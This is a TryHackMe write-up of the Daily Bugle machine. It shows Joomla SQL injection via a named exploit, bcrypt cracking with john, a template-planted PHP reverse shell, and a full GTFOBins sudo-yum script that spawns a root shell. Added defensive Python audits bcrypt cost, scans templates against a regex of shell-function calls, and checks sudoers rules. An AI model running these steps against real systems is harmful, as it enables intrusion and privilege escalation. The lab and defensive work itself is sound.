[Write-up]: Daily Bugle Machine On TryHackMe

Hi everybody,
I've started hacking machines on TryHackMe to prepare for the OSCP exam during these quarantine times, and I decided to write walkthroughs of the machines I hacked successfully. This post is the walkthrough for the Daily Bugle machine.

Let’s Begin :) Note that enumeration is always key :)

Nmap Scanning

As usual, we start with an nmap scan to gather information about open ports. Use the following command to list the available ports and the services behind them.

nmap -sV -sC -T4 <your-machine-ip>

Result of nmap scanning

The nmap scan shows just three open ports:

  • SSH on port 22 (OpenSSH 7.4)
  • A web server on port 80 (Apache 2.4.6, running Joomla CMS)
  • MySQL on port 3306 (MariaDB)

We don't have much to go on yet, so we can start by looking at the web server. When we open the URL (http://your-ip), we see a blog site built on the Joomla engine. To get more information about the site, we can enumerate its directories with GoBuster or JoomScan. I preferred JoomScan, run with the following command.

JoomScan Scanning

joomscan -u http://<your-ip>/

Result of joomscan

JoomScan reports the Joomla version and the administrator URL. Searching the Joomla version number (3.7.0) with searchsploit shows that 3.7.0 is vulnerable to SQL injection.

Screenshot: searchsploit result

Running Joomblah Exploit

After a short search I found an exploit on GitHub, Joomblah, for Joomla 3.7.0 (CVE-2017-8917), and ran the Python script.

Result of Joomblah

After running the script, we have the following user credentials:

  • User name: jonah
  • Password hash: [REDACTED]
  • User role: super user

Cracking Password

The hashed password starts with $2y$, which means it is a bcrypt hash. We can use john, which comes preinstalled on Kali, to crack it with the rockyou wordlist. The following command gives us his password; it takes a few minutes.

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt password_hash
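Why john needs a few minutes here comes down to bcrypt's cost factor, which is encoded right after the $2y$ prefix. The following Python is an added example and not code from the original write-up: it names a crypt-style hash scheme from its prefix, parses a bcrypt string into variant, cost, salt and digest, flags a cost below a chosen minimum (the default of 10 is an assumed policy value), and scales a benchmark rate by the cost so you can see why each cost step doubles cracking time. The hash it works on is a constructed sample in the correct layout, not the redacted one from the machine, and the candidate count and guess rate in the usage are assumed figures.

```python
import re

# Prefix table for crypt(3)-style hashes.  Constructed for this example;
# extend it with whatever your password store actually uses.
HASH_PREFIXES = {
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$1$": "md5crypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$argon2i$": "argon2i",
    "$argon2id$": "argon2id",
}

# Modular-crypt bcrypt layout: $2y$<2-digit cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Constructed sample in valid bcrypt layout; it is NOT the hash from the machine.
SAMPLE_HASH = "$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"


def identify_hash(h: str) -> str:
    """Name the scheme of a crypt-style hash from its prefix, or 'unknown'."""
    for prefix, name in HASH_PREFIXES.items():
        if h.startswith(prefix):
            return name
    return "unknown"


def parse_bcrypt(h: str) -> dict:
    """Split a bcrypt string into its fields; cost is log2 of the key-setup rounds."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % h)
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    return {"variant": variant, "cost": cost, "rounds": 2 ** cost,
            "salt": salt, "digest": digest}


def audit_bcrypt_cost(h: str, minimum_cost: int = 10):
    """Return (ok, message).  The minimum of 10 is an assumed policy value."""
    info = parse_bcrypt(h)
    if info["cost"] < minimum_cost:
        return False, "cost %d is below the minimum %d" % (info["cost"], minimum_cost)
    return True, "cost %d ok (%d rounds per guess)" % (info["cost"], info["rounds"])


def estimate_wordlist_seconds(h: str, candidates: int,
                              guesses_per_second_at_cost5: float) -> float:
    """Rough time to try `candidates` passwords against this hash on one machine.

    bcrypt work doubles per cost step, so a rate measured at cost 5 (an assumed
    benchmark figure the caller supplies) is scaled down by 2**(cost-5).
    """
    cost = parse_bcrypt(h)["cost"]
    rate = guesses_per_second_at_cost5 / (2 ** (cost - 5))
    return candidates / rate


if __name__ == "__main__":
    print(identify_hash(SAMPLE_HASH), parse_bcrypt(SAMPLE_HASH))
    print(audit_bcrypt_cost(SAMPLE_HASH))
    # Assumed numbers: 14 million candidates, 100k guesses/s at cost 5
    print("%.0f s" % estimate_wordlist_seconds(SAMPLE_HASH, 14_000_000, 100_000.0))
```

The cost audit is the defender's takeaway: a store full of cost-4 bcrypt hashes falls to the same wordlist 64 times faster than one at cost 10, and the check is cheap to run across a whole user table.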

Reverse Shell

Now we have credentials for the Joomla administrator login page (found with JoomScan). First, I quickly tried to connect to the machine via SSH (people mostly reuse the same credentials everywhere), but the username and password were not valid. I logged in to the administrator page and investigated the panel. After nearly half an hour, I discovered that we can edit and run PHP code in the protostar template, found under the Extensions -> Templates menu.

Screenshot: the protostar template editor

After learning this trick, I added PentestMonkey's PHP reverse shell code to the index.php file and got a reverse shell successfully via nc.

Screenshot: reverse shell caught with nc
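The template editor gave an administrator a way to drop PHP into a file the web server executes, and from the defender's side those same files are what to watch. The following Python is an added example, not code from the write-up: it walks a Joomla templates directory and reports PHP files modified after a known-good baseline timestamp as well as files calling functions a template never needs (fsockopen and proc_open, which PentestMonkey's shell is built on, plus a few similar ones). The directory tree, file contents and baseline time are all constructed inline; the indicator list is an assumption to tune for your site.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Calls a Joomla template file never needs.  Constructed indicator list;
# the first two are what PentestMonkey's reverse shell is built on.
SUSPICIOUS_CALLS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|exec|system|eval|base64_decode)\s*\(",
    re.IGNORECASE,
)


def scan_templates(root, baseline_mtime):
    """Return sorted (relative path, reason) findings for PHP files under root.

    Two independent signals: content (suspicious function calls) and
    integrity (mtime newer than the baseline snapshot you trust).
    """
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        calls = sorted({m.group(1).lower() for m in SUSPICIOUS_CALLS.finditer(text)})
        if calls:
            findings.append((rel, "suspicious calls: " + ", ".join(calls)))
        if path.stat().st_mtime > baseline_mtime:
            findings.append((rel, "modified after baseline"))
    return sorted(findings)


def demo():
    """Build a constructed templates tree, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "templates"
        tpl = root / "protostar"
        tpl.mkdir(parents=True)

        now = time.time()
        baseline = now - 3600          # assume the trusted snapshot is an hour old
        old = now - 86400              # the untouched file predates it

        clean = tpl / "error.php"
        clean.write_text("<?php defined('_JEXEC') or die;\necho $this->error->getMessage();\n")
        os.utime(clean, (old, old))

        # Constructed marker lines only; the variables are deliberately undefined
        tampered = tpl / "index.php"
        tampered.write_text(
            "<?php defined('_JEXEC') or die;\n"
            "$sock = fsockopen($target, $port);\n"
            "$proc = proc_open($cmd, $descriptors, $pipes);\n"
        )
        return scan_templates(root, baseline)


if __name__ == "__main__":
    for rel, reason in demo():
        print(rel, "-", reason)
```

In production the baseline would be the timestamp of your last deployment or a stored hash manifest, and the content check is best paired with the Joomla action log so an edit through the template editor is tied to the administrator account that made it.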

I did some digging on the machine, came across the configuration.php file in /var/html/www, and found the current username in the home directory.

Screenshot: configuration.php

We have a second set of credentials now; it can be tried anywhere.

  • User Name: jjameson
  • Password: [REDACTED]

The first question is: what is the user flag? (for jjameson)
I tried the username and password for an SSH connection with the following command.

ssh jjameson@<your-ip>

The user flag is in the user.txt file in /home/jjameson.

Screenshot: user flag

Privilege Escalation

After grabbing the user flag, I examined the following things for privilege escalation on the system.

  • Crontab
  • SUID files
  • sudo -l command

The jjameson user can run yum via sudo. Yum is the primary tool for getting, installing, deleting, querying, and managing Red Hat Enterprise Linux RPM software packages. After a quick search, I found the technique for becoming root by running yum on GTFOBins.

# Temporary directory that will hold the yum config and the plugin
TF=$(mktemp -d)

# Minimal yum config that turns plugins on and points yum at $TF for them
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

# Plugin config enabling the plugin named "y"
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

# The plugin itself; yum calls init_hook when it loads the plugin
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF

# Run yum under sudo with the custom config and the plugin enabled
sudo yum -c $TF/x --enableplugin=y

The second question is: what is the root flag? (for root)
If we run the code above, we get a root shell. The root flag is in the root.txt file in /root/.

Screenshot: root flag
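The root cause of this escalation is a sudo rule that lets jjameson run yum with any arguments, so yum's own -c and --enableplugin options load whatever the user wrote. The following Python is an added example, not code from the write-up or from GTFOBins: it parses sudoers-style user-spec lines, flags rules granting unrestricted ALL to non-root users and rules that allow yum with no argument restriction, and leaves alone a rule pinned to a fixed argument list (sudoers only matches a command whose arguments equal the ones listed). The sudoers text is a constructed sample, and the set of binaries to flag is seeded only with yum, the case on this page; aliases and #include directives are not handled.

```python
import re

# Binaries that take a user-supplied config or plugin path and so yield a
# root shell under sudo unless arguments are pinned.  Seeded only with yum,
# the case on this page; extend for your environment.
SHELL_ESCAPE_BINARIES = {"yum"}

# user  host=(runas) [TAG: ...] command [args], command [args]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)

# Constructed sudoers excerpt; the jjameson line mirrors the rule on this machine
SAMPLE_SUDOERS = """
# constructed sample, not the machine's real file
Defaults    env_reset
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
jjameson    ALL=(ALL)       NOPASSWD: /usr/bin/yum
ops         ALL=(root)      /usr/bin/yum update   # args pinned: only 'yum update'
"""


def parse_sudoers(text):
    """Parse simple user-spec lines into rule dicts (aliases/includes ignored)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            tags = []
            # Leading TAG: prefixes such as NOPASSWD: or SETENV:
            while ":" in spec and spec.split(":", 1)[0].strip().isupper():
                tag, spec = spec.split(":", 1)
                tags.append(tag.strip())
                spec = spec.strip()
            parts = spec.split()
            rules.append({
                "user": m.group("who"),
                "runas": m.group("runas") or "root",
                "tags": tags,
                "command": parts[0] if parts else "",
                "args": parts[1:],
            })
    return rules


def audit_sudoers(rules):
    """Return (user, command, problem) for rules a hardening review should question."""
    findings = []
    for r in rules:
        if r["user"] == "root":
            continue
        base = r["command"].rsplit("/", 1)[-1]
        if r["command"] == "ALL":
            findings.append((r["user"], "ALL", "unrestricted sudo"))
        elif base in SHELL_ESCAPE_BINARIES and not r["args"]:
            findings.append((r["user"], r["command"],
                             "arguments unrestricted; -c/--enableplugin load user files as root"))
    return findings


if __name__ == "__main__":
    for user, cmd, problem in audit_sudoers(parse_sudoers(SAMPLE_SUDOERS)):
        print("%-10s %-14s %s" % (user, cmd, problem))
```

The fix the audit points at is to pin the arguments (as in the ops line) or to replace the rule with a small wrapper script that runs the one yum operation the user actually needs, rather than exposing yum's full option set as root.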

That's all; it's a nice machine. See you in the next blog post :)